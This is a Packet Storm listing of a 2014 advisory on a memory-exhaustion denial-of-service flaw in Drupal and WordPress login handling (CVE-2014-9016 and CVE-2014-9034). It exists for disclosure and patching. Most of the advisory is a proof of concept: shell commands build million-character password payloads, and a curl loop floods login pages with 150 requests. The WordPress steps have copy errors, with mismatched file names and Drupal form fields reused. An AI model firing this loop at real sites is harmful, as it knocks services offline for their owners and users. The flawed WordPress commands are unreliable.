Lucene search

K
packetstormJaver NietoPACKETSTORM:129341
HistoryDec 01, 2014 - 12:00 a.m.

Drupal / WordPress Memory Exhaustion

2014-12-0100:00:00
Javer Nieto
packetstormsecurity.com
35

0.283 Low

EPSS

Percentile

96.4%

`====================================================================  
DESCRIPTION:  
====================================================================  
A vulnerability present in Wordpress < 4.0.1 and Drupal < 7.34 allows an  
attacker to send specially crafted requests resulting in CPU and memory  
exhaustion. This may lead to the site becoming unavailable or  
unresponsive (denial of service).  
  
====================================================================  
Time Line:  
====================================================================  
  
November 19, 2014 - A Drupal security update and the security advisory  
is published.  
  
November 20, 2014 - A Wordpress security update and the security  
advisory is published.  
  
====================================================================  
Proof of Concept:  
====================================================================  
  
  
Drupal Denial of Service CVE-2014-9016  
Generate a pyaload and try with a non-valid user:  
  
$ echo -n "name=NO-VALID-USER&pass=" > no_valid_user_payload && printf "%s" {1..1000000} >> no_valid_user_payload && echo -n "&op=Log in&form_id=user_login" >> no_valid_user_payload  
  
$ time curl --data @no_valid_user_payload http://yoursite/drupal/?q=user --silent > /dev/null &  
  
Generate a pyaload and try with a valid user:  
  
$ echo -n "name=admin&pass=" > valid_user_payload && printf "%s" {1..1000000} >> valid_user_payload && echo -n "&op=Log in&form_id=user_login" >> valid_user_payload  
  
$ time curl --data @valid_user_payload http://yoursite/drupal/?q=user --silent > /dev/null &  
  
Perform a Dos with a valid user:  
  
$ for i in `seq 1 150`; do (curl --data @valid_user_payload http://yoursite/drupal/?q=user --silent > /dev/null &); sleep 0.25; done  
Wordpress Denial of Service CVE-2014-9034  
Generate a pyaload and try with a non-valid user:  
  
$ echo -n "log=NO-VALID-USER&pwd=" > payload && printf "%s" {1..1000000} >> payload && echo -n "&wp-submit=Log In" >> payload  
  
$ time curl --data @no_valid_user_payload http://yoursite/wordpress/wp-login.php --silent > /dev/null &  
  
Generate a pyaload and try with a valid user:  
  
$ echo -n "name=admin&pass=" > valid_user_payload && printf "%s" {1..1000000} >> valid_user_payload && echo -n "&op=Log in&form_id=user_login" >> valid_user_payload  
  
$ time curl --data @valid_user_payload http://yoursite/wordpress/wp-login.php --silent > /dev/null &  
  
Perform a Dos with a valid user:  
  
$ for i in `seq 1 150`; do (curl --data @valid_user_payload http://yoursite/wordpress/wp-login.php --silent > /dev/null &); sleep 0.25; done  
  
  
====================================================================  
Authors:  
====================================================================  
  
-- Javer Nieto -- http://www.behindthefirewalls.com  
-- Andres Rojas -- http://www.devconsole.info  
  
====================================================================  
References:  
====================================================================  
  
* https://wordpress.org/news/2014/11/wordpress-4-0-1/  
  
* https://www.drupal.org/SA-CORE-2014-006  
  
*  
http://www.behindthefirewalls.com/2014/11/wordpress-denial-of-service-responsible-disclosure.html  
  
*  
http://www.behindthefirewalls.com/2014/11/drupal-denial-of-service-responsible-disclosure.html  
  
* http://www.devconsole.info/?p=1050  
  
`

0.283 Low

EPSS

Percentile

96.4%

Related for PACKETSTORM:129341